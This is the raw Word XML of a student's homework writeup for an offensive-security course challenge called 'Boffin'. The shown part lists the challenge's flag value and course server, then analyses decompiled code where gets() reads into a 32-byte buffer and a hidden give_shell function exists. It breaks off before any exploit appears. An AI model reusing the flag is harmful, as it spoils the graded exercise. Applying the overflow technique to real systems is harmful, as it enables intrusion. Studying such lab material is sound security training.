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26629" w14:textId="42E18E16" w:rsidR="000E2AB3" w:rsidRDefault="00996E4A" w:rsidP="00D139EB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc159948653"/>
      <w:r>
        <w:t xml:space="preserve">Homework </w:t>
      </w:r>
      <w:r w:rsidR="00E7302F">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D139EB">
        <w:t>Challenge Writeup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6F73F2AE" w14:textId="6F2AADEF" w:rsidR="00115EE2" w:rsidRPr="00115EE2" w:rsidRDefault="00252A48" w:rsidP="00115EE2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wn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Part One</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5AF0B5" w14:textId="5C52FF88" w:rsidR="00D139EB" w:rsidRDefault="00D139EB" w:rsidP="00D139EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Lindsay Von Tish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7F78B5" w14:textId="62C62CBF" w:rsidR="00D139EB" w:rsidRDefault="00D139EB" w:rsidP="00D139EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>lmv9443@nyu.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E3ED4" w14:textId="68C2CA34" w:rsidR="00D139EB" w:rsidRPr="00D139EB" w:rsidRDefault="00D139EB" w:rsidP="00D139EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>02/</w:t>
      </w:r>
      <w:r w:rsidR="00252A48">
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:t>/2024</w:t>
      </w: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132630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CB08C" w14:textId="250F7D1A" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="00087743">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="47B9CD21" w14:textId="40AABE40" w:rsidR="00B32A19" w:rsidRDefault="00087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5264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc159948653" w:history="1">
            <w:r w:rsidR="00B32A19" w:rsidRPr="001A32D8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Homework 4 Challenge Writeup</w:t>
            </w:r>
            <w:r w:rsidR="00B32A19">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B32A19">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B32A19">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159948653 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B32A19">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B32A19">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B32A19">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00B32A19">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DFF56F6" w14:textId="0C2FBB1C" w:rsidR="00B32A19" w:rsidRDefault="00B32A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948654" w:history="1">
            <w:r w:rsidRPr="001A32D8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Challeng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EB65" w14:textId="36813E8C" w:rsidR="00B32A19" w:rsidRDefault="00B32A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948655" w:history="1">
            <w:r w:rsidRPr="001A32D8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bof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34DE" w14:textId="24932001" w:rsidR="00B32A19" w:rsidRDefault="00B32A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948656" w:history="1">
            <w:r w:rsidRPr="001A32D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04CF" w14:textId="2457A281" w:rsidR="00B32A19" w:rsidRDefault="00B32A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948657" w:history="1">
            <w:r w:rsidRPr="001A32D8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6313" w14:textId="306B0D37" w:rsidR="00B32A19" w:rsidRDefault="00B32A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948658" w:history="1">
            <w:r w:rsidRPr="001A32D8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lo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9CA1" w14:textId="517119C7" w:rsidR="00B32A19" w:rsidRDefault="00B32A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948659" w:history="1">
            <w:r w:rsidRPr="001A32D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A654" w14:textId="170F4BC3" w:rsidR="00B32A19" w:rsidRDefault="00B32A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948660" w:history="1">
            <w:r w:rsidRPr="001A32D8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B631" w14:textId="5855F4D0" w:rsidR="00B32A19" w:rsidRDefault="00B32A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948661" w:history="1">
            <w:r w:rsidRPr="001A32D8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix A: Stud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28D3" w14:textId="61651E58" w:rsidR="00B32A19" w:rsidRDefault="00B32A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948662" w:history="1">
            <w:r w:rsidRPr="001A32D8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix B: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1B3E" w14:textId="6C375B69" w:rsidR="00B32A19" w:rsidRDefault="00B32A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948663" w:history="1">
            <w:r w:rsidRPr="001A32D8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix C: Boffin_Pw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E547" w14:textId="0AE49F25" w:rsidR="00B32A19" w:rsidRDefault="00B32A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948664" w:history="1">
            <w:r w:rsidRPr="001A32D8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix D: Lockbox_Pw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DAFB" w14:textId="1009A0C6" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00087743">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005264D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084E113C" w14:textId="00130FE9" w:rsidR="00B00365" w:rsidRPr="005264D0" w:rsidRDefault="00087743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1481AB" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB3E752" w14:textId="1FD847D6" w:rsidR="00646037" w:rsidRDefault="0052786E" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc159948654"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Challenge</w:t>
      </w:r>
      <w:r w:rsidR="00646037">
        <w:t xml:space="preserve"> Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="057F48A4" w14:textId="0F559CF3" w:rsidR="009F3B92" w:rsidRPr="001215EC" w:rsidRDefault="009F3B92" w:rsidP="009F3B92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc159948655"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Boffin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F127019" w14:textId="77777777" w:rsidR="009F3B92" w:rsidRPr="00530A29" w:rsidRDefault="009F3B92" w:rsidP="009F3B92">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc159948656"/>
      <w:r w:rsidRPr="000F56D3">
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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461"/>
        <w:gridCol w:w="1234"/>
        <w:gridCol w:w="6655"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F3B92" w:rsidRPr="005264D0" w14:paraId="6096DF55" w14:textId="77777777" w:rsidTr="00DF5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3"/>
          </w:tcPr>
          <w:p w14:paraId="01637BF4" w14:textId="7D93FA22" w:rsidR="009F3B92" w:rsidRPr="005264D0" w:rsidRDefault="009F3B92" w:rsidP="00DF5A5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offin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F3B92" w:rsidRPr="005264D0" w14:paraId="0C590C0D" w14:textId="77777777" w:rsidTr="00DF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1" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D5672" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="1702B9B7" w14:textId="7FCF5247" w:rsidR="009F3B92" w:rsidRPr="00DA733E" w:rsidRDefault="009F3B92" w:rsidP="00DF5A5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1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00 Points</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5E9B6DC2" w14:textId="77777777" w:rsidR="009F3B92" w:rsidRPr="00EE0A5C" w:rsidRDefault="009F3B92" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Flag Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0BCE81DF" w14:textId="3297024C" w:rsidR="009F3B92" w:rsidRPr="005264D0" w:rsidRDefault="009F3B92" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F3B92">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>flag{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009F3B92">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>access_granted_thats_real_cool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009F3B92">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F3B92" w:rsidRPr="005264D0" w14:paraId="2122D760" w14:textId="77777777" w:rsidTr="00DF5A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4F2FFF80" w14:textId="77777777" w:rsidR="009F3B92" w:rsidRPr="005264D0" w:rsidRDefault="009F3B92" w:rsidP="00DF5A55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7F69B4DA" w14:textId="77777777" w:rsidR="009F3B92" w:rsidRPr="00EE0A5C" w:rsidRDefault="009F3B92" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Location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154C09DB" w14:textId="3C4A47E0" w:rsidR="009F3B92" w:rsidRPr="005264D0" w:rsidRDefault="009F3B92" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DB49B6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB49B6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> offsec-chalbroker.osiris.cyber.nyu.edu 133</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F3B92" w:rsidRPr="005264D0" w14:paraId="667A9EBA" w14:textId="77777777" w:rsidTr="00DF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50AD35EC" w14:textId="77777777" w:rsidR="009F3B92" w:rsidRPr="005264D0" w:rsidRDefault="009F3B92" w:rsidP="00DF5A55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shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1FFA737B" w14:textId="77777777" w:rsidR="009F3B92" w:rsidRPr="00EE0A5C" w:rsidRDefault="009F3B92" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="662CF9DE" w14:textId="77777777" w:rsidR="009F3B92" w:rsidRDefault="009F3B92" w:rsidP="00DF5A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ffer Overflows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F3B92" w:rsidRPr="005264D0" w14:paraId="641C3419" w14:textId="77777777" w:rsidTr="00DF5A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092820B0" w14:textId="77777777" w:rsidR="009F3B92" w:rsidRPr="005264D0" w:rsidRDefault="009F3B92" w:rsidP="00DF5A55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637AAE9E" w14:textId="77777777" w:rsidR="009F3B92" w:rsidRPr="00EE0A5C" w:rsidRDefault="009F3B92" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Filenam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489C374" w14:textId="3A574834" w:rsidR="009F3B92" w:rsidRDefault="009F3B92" w:rsidP="00DF5A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offin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29077FC5" w14:textId="77777777" w:rsidR="009F3B92" w:rsidRDefault="009F3B92" w:rsidP="009F3B92">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc159948657"/>
      <w:r w:rsidRPr="00840BBB">
        <w:t>Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="19E6D79E" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">When run normally, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> asks the user for a name and then prints the name in the respon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F5B" w14:paraId="302A60E5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CDFA1FF" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B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0A56A981" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>$ .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39B162A0" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Hey! What's your name?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="652166C5" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Juneau</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="213CAFA0" w14:textId="4D707AD1" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Hi, Juneau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14A0ECC5" w14:textId="6F24894D" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>First Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B739CF8" w14:textId="41632C22" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">The program's </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method, shown below after </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decompilation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, takes in the user-entered </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function is known to be insec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F5B" w14:paraId="7A2A368C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4353CFE9" w14:textId="327E1035" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">undefined8 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>main(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>EVP_PKEY_CTX *param_1){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="015BEA4D" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  char name [32</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>];</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3E38387B" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>init</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(param_1</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0DDB9C7B" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B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>"Hey! What\'s your name?"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3D0ED8CD" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  gets(name</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7D9FFA33" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B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Hi, %s\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>n",name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D4E6C89" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  return </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>0;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2F8AC812" w14:textId="44A6C745" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31730398" w14:textId="60FC48F0" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Main Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D599BED" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method does not call any other functions. However, the list of disassembled functions reveals a function called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E94DE3E" w14:textId="6A16D1F2" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D270FC5" wp14:editId="2B549E61">
            <wp:extent cx="2133600" cy="2215662"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13335"/>
            <wp:docPr id="522870666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70666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04" cy="2220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 w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453A0213" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F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F5B" w14:paraId="1E0CD83C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7E17D456" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>give_shell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(void)</w:t>
            </w:r>
          </w:p>
